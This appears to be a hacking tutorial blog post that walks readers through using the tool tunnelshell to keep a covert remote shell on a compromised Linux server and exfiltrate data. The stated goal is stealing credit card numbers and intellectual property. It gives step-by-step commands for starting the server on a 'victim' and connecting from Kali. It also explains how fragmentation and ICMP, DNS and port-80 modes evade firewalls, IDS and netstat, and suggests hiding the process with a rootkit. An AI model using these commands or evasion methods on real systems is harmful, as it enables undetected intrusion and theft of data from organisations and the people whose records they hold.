Hack Like a Pro: How to Create a Nearly Undetectable Covert Channel with Tunnelshell

Welcome back, my rookie hackers!

Most often, the professional hacker is seeking protected information from the target system or network. This might be credit card numbers, personally identifiable information, or intellectual property (formulas, plans, blueprints, designs, etc.). Most of my Null Byte guides have been focused on getting into the system, but this only begs the question—"what do I do when I get there?"

If a hacker is pursuing information or data, they need a way to get the data out of the target system or network. Optimally, they want to get the data out in a way that won't be detected by the security devices or the security admins. In this tutorial, we will look at creating a covert channel that we can use to extract the data with little chance of being detected using a tool called tunnelshell.

The Basics of Tunnelshell & How It Works

Tunnelshell is a sweet, little program that only works on compromised Linux/Unix servers. As many large corporate and institutional servers are running some flavor from the Unix family (AIX, HP-UX, Solaris, IRIS, Linux, etc.), there should not be a significant impediment to using tunnelshell for exfiltrating (removing) data.

Of course, it won't work on extracting data from your ex-wife's or girlfriend's computer, not even a small-to-medium sized company using one of the many versions of Windows Server (2003, 2008, 2012), but it will work on the big boy servers, which is where all the valuable goodies are.

It operates in the familiar client/server architecture like most Linux/Unix applications. The beauty of tunnelshell is that it will work over multiple protocols, including TCP, UDP, ICMP, and RawIP. In addition, it is able to fragment packets to get past firewalls and intrusion detection systems.

In TCP and UDP modes, it does not require binding to a socket or port, so when the victim runs netsat, no open port will appear (but it will appear in the process list). In TCP mode, no three-way handshake (SYN, SYN-ACK, ACK) is executed, so no IP address will be logged.

In ICMP mode, tunnelshell uses the ICMP Echo Request/Echo Reply (Type 8 and Type 0) to transport the data. Therefore, it appears to be a continuous ping running between the systems. Although many routers and firewalls block ICMP coming IN, they usually do not block ICMP going OUT as users and admins need to use ping to find active hosts.

Using Tunnelshell for an Undetectable Covert Channel

Unfortunately, Kali does not include tunnelshell. I think you can understand that the developers of Kali could not include all of the hacking and security tools out there. In this tutorial, I will be creating a tunnel between our Kali system and a compromised Linux system. In this case, I will use BackTrack 5v3 (which is built on Ubuntu) as my victim, but any of the UNIX/Linux flavors will work as an adequate victim.

Step 1: Fire Up Kali

Fire up Kali and let's download tunnelshell. Normally, we could use the apt-get or Kali's graphical Add/Remove Software utility, but since tunnelshell is not in Kali's repository, that's not an option. There are numerous ways we could download it, but let's use the old-fashioned way of simply going to website and downloading it.

Navigate to Packet Storm Security to download tunnelshell. Notice that it is .tgz file, which means that it is a compressed .tar file. This means that we will need to untar it and uncompress it before we can use it.

In the screenshot below, I have downloaded it to BackTrack. Obviously, if this was the victim system, this would not be easiest or most stealthy way to get tunnelshell on that system. In reality, I could TFTP it from my attacking system to the victim, or if I have Metasploit's Meterpreter on the victim, I have the built-in upload command there.

In the screenshot below, you can see that I have successfully downloaded tunnelshell to the victim.

I need to also download it to my Kali system. I have highlighted the tunnelshell file in my root user directory. It doesn't matter what directory you put it in, just remember where you put it and run the commands from that directory.

Step 2: Untar & Uncompress Tunnelshell

To unpack tunnelshell, type:

kali > tar xvfz tunnelshell_2.3.tgz

To compile our new tool, simply type:

kali > make

Step 3: Activate Tunnelshell on the Victim

Now that we have downloaded and compiled tunnelshell on the victim system, the only thing we need to do is type:

kali > ./tunneld

This opens up the server on the victim system waiting for our connection from the client (the attacker). Since we did not use any switches in activating tunnelshell, it runs in the default configuration using packet fragmentation.

The beauty of this default configuration is that it sends fragmented packets (packets are broken up into pieces that are reassembled at the destination—a tried and true method of evading detection) that can bypass without detection nearly every firewall and IDS.

Step 4: Connect to the Tunnel

Now, we only need to connect to the tunnelshell daemon (a background service) on the victim. The syntax is simple, we simply type:

kali > ./tunnel -t frag 192.168.89.191

• -t - this switch precedes the type of tunnel
• frag - defines the type
• 192.168.89.191 - the IP address of the victim where the tunnelshell server is running

When we do this, tunnelshell connects, but does not give us a command prompt, but rather a blank line. We can then type any Linux command and it returns output as if we were at a Linux prompt.

So, below, I typed pwd (present working directory) and it returned the directory that the tunnel is running on the victim, /tmp. When I type ls -l, it provides with a long listing of the /tmp directory. I can then go ahead and type any Linux command from this shell.

Step 5: Trying to Detect Tunneshell on the Victim

Now that we have established a tunnel between the victim and the attacker, let's check to see whether the victim can detect our tunnel. Let's go to the victim system (in this case BackTrack on Ubuntu) and see whether, as a sysadmin, we can detect the tunnel.

First, let's try netstat, which should show us all current connections to our computer. When we type netstat on the victim, you can see many connections, but not our tunnelshell.

The one weakness of tunnelshell is that unless we can embed in a rootkit that will hide its process such as with Knark, it does appear on our process list as shown below.

Other Configurations

Here we used tunnelshell in its default configuration using packet fragmentation, but tunnelshell is also able to use ICMP, TCP, UDP and RawIP, all of which might be more useful depending upon the circumstances.

ICMP

To run tunnelshell in ICMP mode, you can start the server with:

./tunneld -t icmp -m echo-reply

And the client with:

./tunnel -t icmp -m echo-reply, echo <IPaddressofvictim>

UDP

To run tunnelshell in UDP mode over DNS, you can start the server with:

./tunneld -t udp -p 53, 2000

And the client with:

./tunnel -t udp -p 53, 2000 <IPaddressofvictim>

TCP

To start tunnelshell in TCP mode over port 80, you can start the server with:

./tunneld -t tcp -p 80, 2000

And the client with:

./tunnel -t tcp -p 80, 2000 <IPaddressofvictim>

Keep coming back, my rookie hackers, as we explore more techniques and tools of the hacker universe!